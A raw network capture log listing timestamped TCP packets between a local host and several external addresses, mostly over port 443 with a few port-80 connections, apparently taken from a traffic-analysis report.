Dec 7, 2024 12:59:21.805445910 CET	443	49719	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.817619085 CET	443	49710	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.817681074 CET	443	49710	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.818109989 CET	49710	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.818110943 CET	49710	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.818110943 CET	49710	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.820925951 CET	49724	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.820970058 CET	443	49724	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.821012020 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.821055889 CET	49724	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.821311951 CET	49724	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.821329117 CET	443	49724	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.852070093 CET	49719	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.979975939 CET	443	49711	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.980043888 CET	443	49711	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.980154037 CET	49711	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.980515003 CET	49711	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.980531931 CET	443	49711	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.980541945 CET	49711	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.980547905 CET	443	49711	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.980880022 CET	443	49712	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.980940104 CET	443	49712	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.981002092 CET	49712	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.981709957 CET	49712	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.981709957 CET	49712	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.981730938 CET	443	49712	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.981741905 CET	443	49712	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.984910011 CET	49725	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.984937906 CET	443	49725	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.985037088 CET	49726	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.985066891 CET	443	49726	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.985080004 CET	49725	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.985116005 CET	49726	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.985265017 CET	49725	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.985279083 CET	443	49725	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.985351086 CET	49726	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:21.985367060 CET	443	49726	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:21.995182037 CET	49716	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:21.995280027 CET	443	49716	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:21.995362043 CET	49716	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.132842064 CET	49710	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:22.132894039 CET	443	49710	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:22.550386906 CET	443	49715	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.551441908 CET	443	49715	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.551512957 CET	49715	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.552901030 CET	49715	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.552927971 CET	443	49715	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.593239069 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.593362093 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.593415022 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.593430042 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.594841003 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.594897985 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.594903946 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.603003025 CET	443	49719	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.603152037 CET	443	49719	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.603202105 CET	49719	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.606477976 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.606533051 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.606539965 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.612653017 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.612710953 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.612716913 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.617997885 CET	49719	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.618017912 CET	443	49719	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.625997066 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.626044989 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.626049995 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.677064896 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.677074909 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.726644039 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.780600071 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.785773039 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.785847902 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.785859108 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.797328949 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.797384024 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.797393084 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.806181908 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.806278944 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.806288958 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.818223953 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.818283081 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.818289995 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.831964016 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.832012892 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.832020044 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.845716953 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.845798969 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.845808983 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.858726025 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.858777046 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.858783007 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.871944904 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.872000933 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.872008085 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.900393963 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.900484085 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.900490046 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.904144049 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.904201031 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.904220104 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.907713890 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.907768011 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.907795906 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.961138964 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.972812891 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.975750923 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.975799084 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.975814104 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.984213114 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.984308004 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.984316111 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.991354942 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:22.991417885 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:22.991425037 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.000735998 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.000833035 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.000838995 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.013348103 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.013418913 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.013423920 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.024816990 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.024883986 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.024890900 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.036417007 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.036592007 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.036612988 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.047882080 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.047976017 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.047986031 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.059592962 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.059678078 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.059681892 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.059691906 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.059731960 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.070975065 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.082256079 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.082348108 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.082360029 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.092852116 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.092940092 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.092971087 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.103415012 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.103494883 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.103503942 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.112997055 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.113056898 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.113064051 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.123403072 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.123481035 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.123486996 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.130983114 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.131045103 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.131074905 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.139334917 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.139417887 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.139425993 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.148049116 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.148104906 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.148111105 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.156570911 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.156650066 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.156658888 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.157618999 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.157672882 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.157680035 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.166615963 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.166719913 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.166743994 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.175359011 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.175424099 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.175436020 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.181951046 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.182037115 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.182044983 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.192253113 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.192339897 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.192347050 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.195684910 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.195750952 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.195758104 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.199198961 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.199259043 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.199265003 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.202877998 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.202959061 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.202965975 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.208236933 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.208296061 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.208307028 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.215898991 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.216002941 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.216008902 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.218705893 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.218758106 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.218764067 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.224179029 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.224246025 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.224253893 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.228754044 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.228813887 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.228820086 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.234407902 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.234461069 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.234622002 CET	49714	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:23.234637022 CET	443	49714	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:23.324845076 CET	443	49722	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.324913979 CET	443	49723	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.327403069 CET	49722	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.327433109 CET	443	49722	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.327874899 CET	49722	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.327879906 CET	443	49722	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.328144073 CET	49723	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.328174114 CET	443	49723	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.328496933 CET	49723	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.328501940 CET	443	49723	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.538398027 CET	443	49724	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.538974047 CET	49724	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.538990021 CET	443	49724	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.539638042 CET	49724	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.539644003 CET	443	49724	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.708043098 CET	443	49726	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.708682060 CET	443	49725	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.708877087 CET	49726	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.708899975 CET	443	49726	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.709018946 CET	49725	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.709038019 CET	443	49725	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.709381104 CET	49726	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.709387064 CET	443	49726	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.709485054 CET	49725	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.709494114 CET	443	49725	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.759741068 CET	443	49722	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.759816885 CET	443	49722	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.759957075 CET	49722	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.760153055 CET	49722	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.760180950 CET	443	49722	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.760195017 CET	49722	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.760202885 CET	443	49722	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.760400057 CET	443	49723	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.760482073 CET	443	49723	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.760539055 CET	49723	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.760615110 CET	49723	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.760615110 CET	49723	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.760633945 CET	443	49723	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.760643959 CET	443	49723	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.763506889 CET	49733	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.763510942 CET	49732	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.763534069 CET	443	49733	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.763537884 CET	443	49732	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.763622999 CET	49733	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.763781071 CET	49732	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.763781071 CET	49732	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.763782024 CET	49733	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.763796091 CET	443	49733	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.763807058 CET	443	49732	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.972740889 CET	443	49724	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.972824097 CET	443	49724	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.972879887 CET	49724	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.973061085 CET	49724	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.973078012 CET	443	49724	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.973090887 CET	49724	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.973097086 CET	443	49724	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.976106882 CET	49734	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.976156950 CET	443	49734	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:23.976232052 CET	49734	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.976402044 CET	49734	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:23.976416111 CET	443	49734	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.041471004 CET	49735	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:24.041506052 CET	443	49735	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:24.041610003 CET	49735	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:24.041912079 CET	49735	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:24.041920900 CET	443	49735	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:24.142426014 CET	443	49726	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.142497063 CET	443	49726	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.142574072 CET	49726	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:24.142807961 CET	49726	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:24.142821074 CET	443	49726	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.142832994 CET	49726	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:24.142838001 CET	443	49726	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.143454075 CET	443	49725	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.143512964 CET	443	49725	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.143563986 CET	49725	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:24.143708944 CET	49725	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:24.143727064 CET	443	49725	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.143743992 CET	49725	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:24.143749952 CET	443	49725	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.145699024 CET	49736	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:24.145731926 CET	49737	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:24.145742893 CET	443	49736	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.145765066 CET	443	49737	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.145814896 CET	49736	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:24.145852089 CET	49737	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:24.146004915 CET	49737	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:24.146007061 CET	49736	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:24.146018982 CET	443	49737	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.146024942 CET	443	49736	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:24.754853010 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:24.754885912 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:24.754952908 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:24.756957054 CET	49738	443	192.168.2.7	52.149.20.212
Dec 7, 2024 12:59:24.756969929 CET	443	49738	52.149.20.212	192.168.2.7
Dec 7, 2024 12:59:24.759789944 CET	49739	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:24.759819031 CET	443	49739	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:24.759887934 CET	49739	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:24.761303902 CET	49739	443	192.168.2.7	23.32.185.164
Dec 7, 2024 12:59:24.761332035 CET	443	49739	23.32.185.164	192.168.2.7
Dec 7, 2024 12:59:25.281840086 CET	49700	443	192.168.2.7	104.98.116.138
Dec 7, 2024 12:59:25.283730984 CET	49740	443	192.168.2.7	104.98.116.138
Dec 7, 2024 12:59:25.283772945 CET	443	49740	104.98.116.138	192.168.2.7
Dec 7, 2024 12:59:25.283854961 CET	49740	443	192.168.2.7	104.98.116.138
Dec 7, 2024 12:59:25.290303946 CET	49740	443	192.168.2.7	104.98.116.138
Dec 7, 2024 12:59:25.290317059 CET	443	49740	104.98.116.138	192.168.2.7
Dec 7, 2024 12:59:25.402618885 CET	443	49700	104.98.116.138	192.168.2.7
Dec 7, 2024 12:59:25.480264902 CET	443	49733	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.480288029 CET	443	49732	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.481004000 CET	49733	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.481024027 CET	443	49733	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.481626987 CET	49733	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.481630087 CET	49732	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.481631994 CET	443	49733	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.481656075 CET	443	49732	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.482105017 CET	49732	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.482114077 CET	443	49732	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.537364960 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:25.537686110 CET	49743	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:25.657907963 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:25.658334970 CET	80	49743	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:25.658457994 CET	49743	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:25.658890963 CET	49743	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:25.697654963 CET	443	49734	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.710643053 CET	49734	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.710681915 CET	443	49734	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.711179018 CET	49734	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:25.711186886 CET	443	49734	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:25.732438087 CET	443	49735	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:25.732754946 CET	49735	443	192.168.2.7	142.250.181.68
Dec 7, 2024 12:59:25.732764006 CET	443	49735	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:25.733088017 CET	443	49735	142.250.181.68	192.168.2.7
Dec 7, 2024 12:59:25.733405113 CET	49735	443	192.168.2.7	142.250.181.68
